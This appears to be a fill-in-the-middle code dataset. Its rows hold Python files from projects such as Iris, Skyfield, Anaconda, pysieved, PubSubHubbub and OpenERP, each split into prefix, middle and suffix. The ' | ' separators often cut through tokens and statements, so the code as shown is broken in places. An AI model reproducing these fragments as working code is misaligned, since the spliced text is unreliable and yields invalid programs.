repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
LukeC92/iris | lib/iris/tests/test_cube_to_pp.py | Python | lgpl-3.0 | 14,217 | 0.005135 | # (C) British Crown Copyright 2010 - 2017, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
import six
# import iris tests first so that some things can be initialised before importing anything else
import iris.tests as tests
import os
import tempfile
import cf_units
import numpy as np
import iris.coords
import iris.coord_systems
import iris.fileformats.pp
from iris.fileformats.pp import PPField3
from iris.tests import mock
import iris.tests.pp as pp
import iris.util
import iris.tests.stock as stock
def itab_callback(cube, field, filename):
cube.add_aux_coord(iris.coords.AuxCoord([field.lbrel], long_name='MOUMHeaderReleaseNumber', units='no_unit'))
cube.add_aux_coord(iris.coords.AuxCoord([field.lbexp], long_name='ExperimentNumber(ITAB)', units='no_unit'))
@tests.skip_data
class TestPPSave(tests.IrisTest, pp.PPTest):
def test_no_forecast_time(self):
cube = stock.lat_lon_cube()
coord = iris.coords.DimCoord(np.array([24], dtype=np.int64),
standard_name='time',
units='hours since epoch')
cube.add_aux_coord(coord)
self.assertCML(cube, ['cube_to_pp', 'no_forecast_time.cml'])
reference_txt_path = tests.get_result_path(('cube_to_pp', 'no_forecast_time.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=cube) as temp_pp_path:
iris.save(cube, temp_pp_path)
def test_no_forecast_period(self):
cube = stock.lat_lon_cube()
# Add a bounded scalar time coord and a forecast_reference_time.
time_coord = iris.coords.DimCoord(
10.958333, standard_name='time',
units='days since 2013-05-10 12:00',
bounds=[10.916667, 11.0])
cube.add_aux_coord(time_coord)
forecast_reference_time = iris.coords.DimCoord(
2.0, standard_name='forecast_reference_time',
units='weeks since 2013-05-07')
cube.add_aux_coord(forecast_reference_time)
self.assertCML(cube, ['cube_to_pp', 'no_forecast_period.cml'])
reference_txt_path = tests.get_result_path(('cube_to_pp',
'no_forecast_period.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=cube) as \
temp_pp_path:
iris.save(cube, temp_pp_path)
def test_pp_save_rules(self):
# Test pp save rules without user rules.
#read
in_filename = tests.get_data_path(('PP', 'simple_pp', 'global.pp'))
cubes = iris.load(in_filename, callback=itab_callback)
reference_txt_path = tests.get_result_path(('cube_to_pp', 'simple.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=cubes) as temp_pp_path:
iris.save(cubes, temp_pp_path)
def test_pp_append_singles(self):
# Test pp append saving - single cubes.
# load 2 arrays of >2D cubes
cube = stock.simple_pp()
reference_txt_path = tests.get_result_path(('cube_to_pp', 'append_single.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=[cube, cube]) as temp_pp_path:
iris.save(cube, temp_pp_path) # Create file
iris.save(cube, temp_pp_path, append=True) # Append to file
reference_txt_path = tests.get_result_path(('cube_to_pp', 'replace_single.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=cube) as temp_pp_path:
iris.save(cube, temp_pp_path) # Create file
iris.save(cube, temp_pp_path) # Replace file
def test_pp_append_lists(self):
# Test PP append saving - lists of cubes.
# For each of the first four time-steps in the 4D cube,
# pull out the bottom two levels.
cube_4d = stock.realistic_4d()
cubes = [cube_4d[i, :2, :, :] for i in range(4)]
reference_txt_path = tests.get_result_path(('cube_to_pp', 'append_multi.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=cubes) as temp_pp_path:
iris.save(cubes[:2], temp_pp_path)
iris.save(cubes[2:], temp_pp_path, append=True) |
reference_txt_path = tests.get_result_path(('cube_to_pp', 'replace_multi.txt'))
with self.cube_save_test(reference_txt_path, reference_cubes=cubes[2:]) as temp_pp_path:
iris.save(cubes[:2], temp_pp_path)
iris.save(cubes[2:], temp_pp_path)
def add_coords_to_cube_and_test(self, coord1, coord2):
# a wrapper for creating arbitrary 2d cross-sections and run pp-saving tests
dataarray = np.arange(16, dtype='>f4' | ).reshape(4, 4)
cm = iris.cube.Cube(data=dataarray)
cm.add_dim_coord(coord1, 0)
cm.add_dim_coord(coord2, 1)
# TODO: This is the desired line of code...
# reference_txt_path = tests.get_result_path(('cube_to_pp', '%s.%s.pp.txt' % (coord1.name(), coord2.name())))
# ...but this is required during the CF change, to maintain the original filename.
coord1_name = coord1.name().replace("air_", "")
coord2_name = coord2.name().replace("air_", "")
reference_txt_path = tests.get_result_path(('cube_to_pp', '%s.%s.pp.txt' % (coord1_name, coord2_name)))
# test with name
with self.cube_save_test(reference_txt_path, reference_cubes=cm,
field_coords=[coord1.name(), coord2.name()]) as temp_pp_path:
iris.save(cm, temp_pp_path, field_coords=[coord1.name(), coord2.name()])
# test with coord
with self.cube_save_test(reference_txt_path, reference_cubes=cm,
field_coords=[coord1, coord2]) as temp_pp_path:
iris.save(cm, temp_pp_path, field_coords=[coord1, coord2])
def test_non_standard_cross_sections(self):
#ticket #1037, the five variants being dealt with are
# 'pressure.latitude',
# 'depth.latitude',
# 'eta.latitude',
# 'pressure.time',
# 'depth.time',
f = FakePPEnvironment()
self.add_coords_to_cube_and_test(
iris.coords.DimCoord(f.z, long_name='air_pressure', units='hPa', bounds=f.z_bounds),
iris.coords.DimCoord(f.y, standard_name='latitude', units='degrees', bounds=f.y_bounds, coord_system=f.geog_cs()))
self.add_coords_to_cube_and_test(
iris.coords.DimCoord(f.z, long_name='depth', units='m', bounds=f.z_bounds),
iris.coords.DimCoord(f.y, standard_name='latitude', units='degrees', bounds=f.y_bounds, coord_system=f.geog_cs()))
self.add_coords_to_cube_and_test(
iris.coords.DimCoord(f.z, long_name='eta', units='1', bounds=f.z_bounds),
iris.coords.DimCoord(f.y, standard_name='latitude', units='degrees', bounds=f.y_bounds, coord_system=f.geog_cs()))
self.add_coords_to_cube_and_test(
iris.coords.DimCoord(f.z, long_name='air_pressure', units='hPa', bounds=f.z_bounds),
iris.coords.DimCoord(f.y, standard_name='time', units=cf_units.Unit('days since 0000-01-01 00:00:00', calendar=cf_units.CALENDAR_360_DAY), bounds=f.y_bounds))
self.add_coords_to_cube_and_test(
iris.coords.DimCoord(f.z, standard_name='depth', units='m', bounds=f.z_bounds),
|
jkonecny12/anaconda | pyanaconda/modules/storage/partitioning/interactive/interactive_interface.py | Python | gpl-2.0 | 1,424 | 0.001404 | #
# DBus interface for the interactive partitioning module
#
# Copyright (C) 2019 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it su | bject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including t | he implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from dasbus.server.interface import dbus_interface
from pyanaconda.modules.common.constants.objects import INTERACTIVE_PARTITIONING
from pyanaconda.modules.storage.partitioning.base_interface import PartitioningInterface
@dbus_interface(INTERACTIVE_PARTITIONING.interface_name)
class InteractivePartitioningInterface(PartitioningInterface):
"""DBus interface for the interactive partitioning module."""
|
skyfielders/python-skyfield | skyfield/framelib.py | Python | mit | 5,257 | 0.004967 | # -*- coding: utf-8 -*-
"""Raw transforms between coordinate frames, as NumPy matrices."""
from numpy import array
from .constants import ANGVEL, ASEC2RAD, DAY_S, tau
from .data.spice import inertial_frames as _inertial_frames
from .functions import mxm, rot_x, rot_z
def build_matrix():
# 'xi0', 'eta0', and 'da0' are ICRS frame biases in arcseconds taken
# from IERS (2003) Conventions, Chapter 5.
xi0 = -0.0166170 * ASEC2RAD
eta0 = -0.0068192 * ASEC2RAD
da0 = -0.01460 * ASEC2RAD
# Compute elements of rotation matrix.
yx = -da0
zx = xi0
xy = da0
zy = eta0
xz = -xi0
yz = -eta0
# Include second-order corrections to diagonal elements.
xx = 1.0 - 0.5 * (yx * yx + zx * zx)
yy = 1.0 - 0.5 * (yx * yx + zy * zy)
zz = 1.0 - 0.5 * (zy * zy + zx * zx)
return array(((xx, xy, xz), (yx, yy, yz), (zx, zy, zz)))
ICRS_to_J2000 = build_matrix()
del build_matrix
_identity = array([(1,0,0), (0,1,0), (0,0,1)])
class ICRS(object):
"""The International Coordinate Reference System (ICRS).
The ICRS is a permanent reference frame which has replaced J2000,
with which its axes agree to within 0.02 arcseconds (closer than the
precision of J2000 itself). The ICRS also supersedes older
equinox-based systems like B1900 and B1950.
"""
@staticmethod
def rotation_at(t):
return _identity
def build_ecliptic_matrix(t):
# Build the matrix to rotate an ICRF vector into ecliptic coordinates.
_, d_eps = t._nutation_angles_radians
true_obliquity = t._mean_obliquity_radians + d_eps
return mxm(rot_x(- true_obliquity), t.M)
class true_equator_and_equinox_of_date(object):
"""The dynamical frame of the Earth’s true equator and equinox of date.
This is supplied as an explicit reference frame in case you want
|xyz| coordinates; if you want angles, it’s better to use the
standard position method ``radec(epoch='date')`` since that will
return the conventional units of hours-of-right-ascension instead of
the degrees-of-longitude that ``frame_latlon()`` would return.
This reference frame combines current theories of the Earth’s
precession and nutation with a small offset between the ITRS and
J2000 systems to produce right ascension and declination for a given
date relative to the Earth’s axis and equator of rotation.
"""
@staticmethod
def rotation_at(t):
return t.M
true_equator_and_equinox_of_date = true_equator_and_equinox_of_date()
_itrs_angvel_matrix = array((
(0.0, DAY_S * ANGVEL, 0.0),
(-DAY_S * ANGVEL, 0.0, 0.0),
(0.0, 0.0, 0.0),
))
class tirs(object):
"""The Terrestrial Intermediate Reference System (TIRS).
Coordinates in this Earth-centered Earth-fixed (ECEF) system are
measured from the axis and equator of the Earth’s rotation, ignoring
the few tenths of an arcsecond by which the Earth’s actual crust and
continents might be askance from the axis. (More precisely: like
the ITRS this frame accounts for precession and nutation, but
neglects polar motion and the TIO locator.)
"""
@staticmethod
def rotation_at(t):
return mxm(rot_z(-t.gast * tau / 24.0), t.M)
@staticmethod
def _dRdt_times_RT_at(t):
# TODO: taking the derivative of the instantaneous angular
# velocity provides a more accurate transform.
return _itrs_angvel_matrix
tirs = tirs()
class itrs(object):
"""The International Terrestrial Reference System (ITRS).
This is the IAU standard for an Earth-centered Earth-fixed (ECEF)
coordinate system, anchored to the Earth’s crust and continents.
This reference frame combines three other reference frames: the
Earth’s true equator and equinox of date, the Earth’ | s rotation with
respect | to the stars, and (if your ``Timescale`` has polar offsets
loaded) the polar wobble of the crust with respect to the Earth’s
pole of rotation.
.. versionadded:: 1.34
"""
@staticmethod
def rotation_at(t):
R = mxm(rot_z(-t.gast * tau / 24.0), t.M)
if t.ts.polar_motion_table is not None:
R = mxm(t.polar_motion_matrix(), R)
return R
@staticmethod
def _dRdt_times_RT_at(t):
# TODO: taking the derivative of the instantaneous angular
# velocity provides a more accurate transform.
return _itrs_angvel_matrix
itrs = itrs()
class ecliptic_frame(object):
"""Reference frame of the true ecliptic and equinox of date."""
def rotation_at(self, t):
return build_ecliptic_matrix(t)
ecliptic_frame = ecliptic_frame()
class InertialFrame(object):
def __init__(self, doc, matrix):
self.__doc__ = doc
self._matrix = matrix
def rotation_at(self, t):
return self._matrix
equatorial_B1950_frame = InertialFrame(
'Reference frame of the Earth’s mean equator and equinox at B1950.',
_inertial_frames['B1950'],
)
ecliptic_J2000_frame = InertialFrame(
'Reference frame of the true ecliptic and equinox at J2000.',
_inertial_frames['ECLIPJ2000'],
)
galactic_frame = InertialFrame(
'Galactic System II reference frame.',
_inertial_frames['GALACTIC'],
)
|
hongta/practice-python | sorting/bucket_sort.py | Python | mit | 416 | 0.012019 | #!/usr/bin/ | env python
# -*- coding: utf-8 -*-
from insertion_sort import insertion_sort
def bucket_sort(a):
"""
0.0 <= a[i] <= 1
"""
b = [[] for _ in a]
n = len(a)
for v in a:
b[int(n*v)].append(v)
a = []
for i in range(len(b)):
a.extend(insertion_sort(b[i]))
return a
if __name__ == '__main__':
d=[0.7, 0.23, 0.03, 0.92,0.21]
bucket_so | rt(d)
|
enthought/etsproxy | enthought/envisage/ui/single_project/action/configure_action.py | Python | bsd-3-clause | 119 | 0 | # proxy module
from __future__ import absolute_import
from envisage.ui.single_project.a | ction.config | ure_action import *
|
reviewboard/reviewboard | reviewboard/diffviewer/evolutions/add_diff_hash.py | Python | mit | 542 | 0 | from django_evolution.mutations import AddField, RenameField
from django.db import models
MUTATIONS = [
RenameField('FileDiff', 'diff', 'diff64', db_column='diff_base64'),
RenameField('FileDiff', 'parent_diff', 'parent_diff64',
db_column='parent_diff_base64'),
AddField('FileDiff', 'diff | _hash', models.ForeignKey, null=True,
related_model='diffviewer.FileDiffData'),
AddField('FileDiff', 'parent_diff_hash', models.ForeignKey, null=True,
| related_model='diffviewer.FileDiffData'),
]
|
sigmunau/nav | python/nav/web/navlets/error.py | Python | gpl-2.0 | 900 | 0 | #
# Copyright (C) 2014 UNINETT AS
#
# This file is part of Network Administration Visualized (NAV).
#
# NAV is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied | warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details. You should have received a copy of t | he GNU General Public
# License along with NAV. If not, see <http://www.gnu.org/licenses/>.
#
"""Replacement widget for when we can not find the widget class"""
from . import Navlet
class ErrorWidget(Navlet):
title = "Error"
description = "Jau"
can_be_added = False
def get_template_basename(self):
return "error"
|
tartopum/MPF | setup.py | Python | mit | 1,662 | 0.007822 | import os
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
import mpf
# Test
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errcode = pytest.main(self.test_args)
sys.exit(errcode)
# README
readme = ""
with open("README.md", "r") as f:
readme = f.read()
# Packages
packages = [
"mpf"
]
# Requirements
def strip_comments(l):
return l.split("#", 1)[0].strip()
def reqs(*f):
return list(filter(None, [strip_comments(l) for l in open(os.path.join(os.getcwd(), *f)).readlines()]))
requirements = reqs("requirements.txt")
test_requirements = reqs("requirements-dev.txt")
test_requirements = requirements + test_requirements[1:]
setup(
name="mpf",
version=mpf.__version__,
description="",
long_description=readme,
author="Vayel",
author_email="vincent.lefoulon@free.fr",
url="https://github.com/Vayel/MPF",
packages=packages,
package_dir={"mpf": "mpf"},
include_package | _data=True,
i | nstall_requires=requirements,
license="MIT",
zip_safe=False,
keywords="mpf",
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.4"
],
cmdclass={"test": PyTest},
tests_require=test_requirements
)
|
supriyantomaftuh/python-publisher | pubsubhubbub_publish_test.py | Python | apache-2.0 | 4,205 | 0.005945 | #!/usr/bin/env python
#
# Copyright 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for the pubsubhubbub_publish module."""
__author__ = 'bslatkin@gmail.com (Brett Slatkin)'
import BaseHTTPServer
import urllib
import unittest
import threading
import pubsubhubbub_publish
REQUESTS = 0
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_POST(self):
global REQUESTS
print 'Accessed', self.path
REQUESTS += 1
length = int(self.headers.get('content-length', 0))
if not length:
return self.send_error(500)
body = self.rfile.read(length)
if self.path == '/single':
if body != urllib.urlencode(
{'hub.url': 'http://example.com/feed', 'hub.mode': 'publish'}):
self.send_error(500)
self.wfile.write('Bad body. Found:')
self.wfile.write(body)
else:
self.send_response(204)
elif self.path == '/multiple':
if body != urllib.urlencode(
{'hub.url': ['http://example.com/feed',
'http://example.com/feed2',
'http://example.com/feed3'],
'hub.mode': 'publish'}, doseq=True):
self.send_error(500)
self.wfile.write('Bad body. Found:')
self.wfile.write(body)
else:
self.send_response(204)
elif self.path == '/batch':
self.send_response(204)
elif self.path == '/fail':
self.send_error(400)
self.wfile.write('bad argument')
else:
self.send_error(404)
class PublishTest(unittest.TestCase):
def setUp(self):
global REQUESTS
REQUESTS = 0
self.server = BaseHTTPServer.HTTPServer(('', 0), RequestHandler)
t = threading.Thread(target=self.server.serve_forever)
t.setDaemon(True)
t.start()
self.hub = 'http://%s:%d' % (
self.server.server_name, self.server.server_port)
self.feed = 'http://example.com/feed'
self.feed2 = 'http://example.com/feed2'
self.feed3 = 'http://example.com/feed3'
def testSingle(self):
pubsubhubbub_publish.publish(self.hub + '/single', self.feed)
self.assertEquals(1, REQUESTS)
def testMultiple(self):
pubsubhubbub_publish.publish(self.hub + '/multiple',
self.feed, self.feed2, self.feed3)
def testList(self):
pubsubhubbub_publish.publish(self.hub + '/multiple',
[self.feed, self.feed2, self.feed3])
def testIterable(self):
pubsubhubbub_publish.publish(self.hub + '/multiple',
iter([self.feed, self.feed2, self.feed3]))
def testBatchSizeLimit(self):
old = pubsubhubbub_publish.URL_BATCH_SIZE
try:
pubsubhubbub_publish.URL_BATCH_SIZE = 2
pubsubhubbub_publish.publish(self.hub + '/batch',
[self.feed, self.feed2, self.feed3])
finally:
pubsubhubbub_publish.URL_BATCH_SIZE = old
self.assertEquals(2, REQUESTS)
def testBadHubHostname(self):
self.assertRaises(
pubsubhubbub_publis | h.PublishError,
pubsubhubbub_publish.publish,
'http://asdf.does.not.resolve', self.feed)
def testBadArgument(self):
self.assertRaises(
pubsubhubbub_publish.PublishError,
pubsubhubbub_publish.publish,
self.hub + '/fail', self.feed)
def testBadHubUrl(self):
self.assertRaises(
pubsubhubbub_publish.PublishError,
pubsubhubbub_publish.publish,
'not://a.url.is.this', self | .feed)
def testNotFound(self):
self.assertRaises(
pubsubhubbub_publish.PublishError,
pubsubhubbub_publish.publish,
self.hub + '/unknown', self.feed)
if __name__ == '__main__':
unittest.main()
|
Cataloniacoin/CataloniacoinS | contrib/wallettools/walletunlock.py | Python | mit | 158 | 0 | from | jsonrpc import ServiceProxy
access = ServiceProxy("http://127.0.0.1:9678")
pwd = raw_input("Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60 | )
|
lopiola/integracja_wypadki | scripts/gb_accident_parser.py | Python | mit | 7,122 | 0.001545 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Parsing accident CSV files for Great Britain data and putting them into DB
"""
import csv
import sys
import db_api.accident
from parsing.common import get_timestamp, translate_field, to_float, to_int, map_from_dictionary, mph_to_kmph
from parsing.gb_common import get_acc_id, GB_IDS_FILE, get_gb_ids
import cPickle as pickle
def is_fatal(accident_data):
if int(accident_data['Accident_Severity']) == 1:
return True
return False
def get_acc_datetime(date, time):
"""
Builds datetime in a form of dictionary based on date and time
of accident.
:param date - Date in format "DD/MM/YYYY"
:param time - Time in format "HH:mm"
"""
datetime = {}
# Date format is "DD/MM/YYYY"
day = int(date[:2])
month = int(date[3:5])
year = int(date[-4:])
datetime['year'] = year
datetime['month'] = month
datetime['day'] = day
# Time format is "HH:mm"
try:
hour = int(time[:2])
minute = int(time[-2:])
datetime['hour'] = hour
datetime['minute'] = minute
except ValueError:
return None
return datetime
def get_timestamp_from_date_time(date, time):
datetime = get_acc_datetime(date, time)
if not datetime:
return None
return get_timestamp(**datetime)
"""
Mapping dictionaries.
"""
snow_dictionary = {
'1': 'NO',
'2': 'NO',
'3': 'YES',
'4': 'NO',
'5': 'NO',
'6': 'YES',
'7': 'NO',
'8': 'NO',
'-1': 'UNKNOWN',
}
rain_dictionary = {
'1': 'NO',
'2': 'YES',
'3': 'NO',
'4': 'NO',
'5': 'YES',
'6': 'NO',
'7': 'NO',
'8': 'NO',
'-1': 'UNKNOWN',
}
wind_dictionary = {
'1': 'NO',
'2': 'NO',
'3': 'NO',
'4': 'YES',
'5': 'YES',
'6': 'YES',
'7': 'NO',
'8': 'NO',
'-1': 'UNKNOWN',
}
fog_dictionary = {
'1': 'NO',
'2': 'NO',
'3': 'NO',
'4': 'NO',
'5': 'NO',
'6': 'NO',
'7': 'YES',
'8': 'NO',
'-1': 'UNKNOWN',
}
road_class_dictionary = {
'1': 'MOTORWAY',
'2': 'MOTORWAY',
'3': 'PRINCIPAL',
'4': 'MAJOR',
'5': 'MINOR',
'6': 'UNCLASSIFIED',
'-1': 'UNKNOWN',
}
junction_dictionary = {
'0': 'NON_JUNCTION',
'1': 'INTERSECTION',
'2': 'INTERSECTION',
'3': 'INTERSECTION',
'4': 'INTERSECTION',
'5': 'RAMP',
'6': 'INTERSECTION',
'7': 'INTERSECTION',
'8': 'DRIVEWAY',
'9': 'INTERSECTION',
'-1': 'UNKNOWN',
}
surface_dictionary = {
'1': 'DRY',
'2': 'WET',
'3': 'SNOW',
'4': 'ICE',
'5': 'FLOOD',
'6': 'OTHER',
'7': 'OTHER',
'-1': 'UNKNOWN',
}
lighting_dictionary = {
'1': 'DAYLIGHT',
'4': 'DARK_LIGHTED',
'5': 'DARK',
'6': 'DARK',
'7': 'DARK',
'-1': 'UNKNOWN',
}
junction_control_dictionary = {
'0': 'YIELD_OR_NONE',
'1': 'AUTH_PERSON',
'2': 'TRAFFIC_SIGNAL',
'3': 'STOP_SIGN',
'4': 'YIELD_OR_NONE',
'-1': 'UNKNOWN',
}
def is_signal_malfunction(special_conditions):
return special_conditions in ['1', '2']
def map_junction_control(junction_control, special_conditions):
if is_signal_malfunction(special_conditions):
return 'SIGNAL_MALF'
else:
return junction_control_dictionary[junction_control]
"""
A mapping from labels in csv file to a tuple of new label for
database and function for transforming old value into new one.
Transforming functions can have arbitrarily many arguments
that are passed in as kwargs.
"""
translator_map = {
'\xef\xbb\xbfAccident_Index': [('id', get_acc_id)],
'Longitude': [('longitude', to_float)],
'Latitude': [('latitude', to_float)],
'Date': [('timestamp', get_timestamp_from_date_time)],
'Day_of_Week': [('day_of_week', to_float)],
'Number_of_Casualties': [('persons_count', to_int)],
'Number_of_Vehicles': [('vehicles_count', to_int)],
'Speed_limit': [('speed_limit', lambda value: mph_to_kmph(int(value)))],
'Weather_Conditions': [
('snow', map_from_dictionary(snow_dictionary)),
('rain', map_from_dictionary(rain_dictionary)),
('fog', map_from_dictionary(fog_dictionary)),
('wind', map_from_dictionary(wind_dictionary))
],
'1st_Road_Class': [('road_class', map_from_dictionary(road_class_dictionary))],
'Junction_Detail': [('relation_to_junction', map_from_dictionary(junction_dictionary))],
'Road_Surface_Conditions': [('surface_cond', map_from_dictionary(surface_dictionary))],
'Light_Conditions': [('lighting', map_from_dictionary(lighting_dictionary))],
'Junction_Control': [('traffic_control', map_junction_control)]
}
def get_kwargs(accident_data, field):
"""
Build kwargs from accident data for a specific field.
Default is one pair: value = field_value_as_string
"""
if field == '\xef\xbb\xbfAccident_Index':
return {'acc_index': accident_data[field]}
if field == 'Date':
return {'date': accident_data['Date'], 'time': accident_data['Time']}
if field == 'Junc | tion_Control':
return {'junction_control': accident_data[field], 'special_conditions': accident_data['Special_Conditions_at_Site']}
return {'value': accident_data[field]}
def update_ids(accidents):
new_ids = {}
for accident in accident | s:
new_ids[accident['id']] = True
ids = get_gb_ids()
ids.update(new_ids)
with open(GB_IDS_FILE, "w+") as pickle_file:
pickle.dump(ids, pickle_file)
if __name__ == '__main__':
if len(sys.argv) != 2:
print('Usage: {0} <csv_file>'.format(sys.argv[0]))
exit(1)
with open(sys.argv[1], 'rt') as csv_file:
reader = csv.DictReader(csv_file)
fields = reader.fieldnames
accidents = []
for accident_data in reader:
if is_fatal(accident_data):
accident = {'country': 'GB'}
for field in fields:
kwargs = get_kwargs(accident_data, field)
try:
label_list = translate_field(field, translator_map, **kwargs)
for (label, value) in label_list:
accident[label] = value
except ValueError:
# We do not want to map this field
pass
# TODO: Change this and count lat/long from osgr
# For now setting to incorrect value (lat/long) can't be more than 180
if 'latitude' not in accident:
accident['latitude'] = 200.0
accident['longitude'] = 200.0
if accident['timestamp']:
accident['fatalities_count'] = 0
accidents.append(db_api.accident.new_from_dict(accident))
# print accident
db_api.accident.insert(accidents)
update_ids(accidents)
|
miracle2k/pysieved | plugins/accept.py | Python | gpl-2.0 | 2,161 | 0.007867 | #! /usr/bin/py | thon
## pysieved - Python managesieve server
## Copyright (C) 2007 Neale Pickett
## This program is free software; you can | redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or (at
## your option) any later version.
## This program is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
## USA
import __init__
import warnings
class ScriptStorage(__init__.ScriptStorage):
def __init__(self):
self.scripts = {}
self.active = None
def __setitem__(self, k, v):
self.scripts[k] = v
def __getitem__(self, k):
return self.scripts[k]
def __delitem__(self, k):
if self.active == k:
raise ValueError('Script is active')
del self.scripts[k]
def __iter__(self):
for k in self.scripts:
yield k
def has_key(self, k):
return self.scripts.has_key(k)
def is_active(self, k):
return self.active == k
def set_active(self, k):
if k != None and k not in self.scripts:
raise KeyError('Unknown script')
self.active = k
class PysievedPlugin(__init__.PysievedPlugin):
def init(self, config):
self.warn = config.getboolean('Accept', 'warn', True)
def auth(self, params):
if self.warn:
warnings.warn('The "accept" module is for testing only!')
return True
def lookup(self, params):
if self.warn:
warnings.warn('The "accept" module is for testing only!')
return '/tmp'
def create_storage(self, params):
if self.warn:
warnings.warn('The "accept" module is for testing only!')
return ScriptStorage()
|
camptocamp/ngo-addons-backport | addons/account/account.py | Python | agpl-3.0 | 191,194 | 0.007307 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
from datetime import datetime
from dateutil.relativedelta import relativedelta
from operator import itemgetter
import time
import openerp
from openerp import SUPERUSER_ID
from openerp import pooler, tools
from openerp.osv import fields, osv, expression
from openerp.tools.translate import _
from openerp.tools.float_utils import float_round as round
import openerp.addons.decimal_precision as dp
_logger = logging.getLogger(__name__)
def check_cycle(self, cr, uid, ids, context=None):
""" climbs the ``self._table.parent_id`` chains for 100 levels or
until it can't find any more parent(s)
Returns true if it runs out of parents (no cycle), false if
it can recurse 100 times without ending all chains
"""
level = 100
while len(ids):
cr.execute('SELECT DISTINCT parent_id '\
'FROM '+self._table+' '\
'WHERE id IN %s '\
'AND parent_id IS NOT NULL',(tuple(ids),))
ids = map(itemgetter(0), cr.fetchall())
if not level:
return False
level -= 1
return True
class account_payment_term(osv.osv):
_name = "account.payment.term"
_description = "Payment Term"
_columns = {
'name': fields.char('Payment Term', size=64, translate=True, required=True),
'active': fields.boolean('Active', help="If the active field is set to False, it will allow you to hide the payment term without removing it."),
'note': fields.text('Description', translate=True),
'line_ids': fields.one2many('account.payment.term.line', 'payment_id', 'Terms'),
}
_defaults = {
'active': 1,
}
_order = "name"
def compute(self, cr, uid, id, value, date_ref=False, context=None):
if not date_ref:
date_ref = datetime.now().strftime('%Y-%m-%d')
pt = self.browse(cr, uid, id, context=context)
amount = value
result = []
obj_precision = self.pool.get('decimal.precision')
prec = obj_precision.precision_get(cr, uid, 'Account')
for line in pt.line_ids:
if line.value == 'fixed':
amt = round(line.value_amount, prec)
elif line.value == 'procent':
amt = round(value * line.value_amount, prec)
elif line.value == 'balance':
amt = round(amount, prec)
if amt:
next_date = (datetime.strptime(date_ref, '%Y-%m-%d') + relativedelta(days=line.days))
if line.days2 < 0:
next_first_date = next_date + relativedelta(day=1,months=1) #Getting 1st of next month
next_date = next_first_date + relativedelta(days=line.days2)
if line.days2 > 0:
next_date += relativedelta(day=line.days2, months=1)
result.append( (next_date.strftime('%Y-%m-%d'), amt) )
amount -= amt
amount = reduce(lambda x,y: x+y[1], result, 0.0)
dist = round(value-amount, prec)
if dist:
result.append( (time.strftime('%Y-%m-%d'), dist) )
return result
class account_payment_term_line(osv.osv):
_name = "account.payment.term.line"
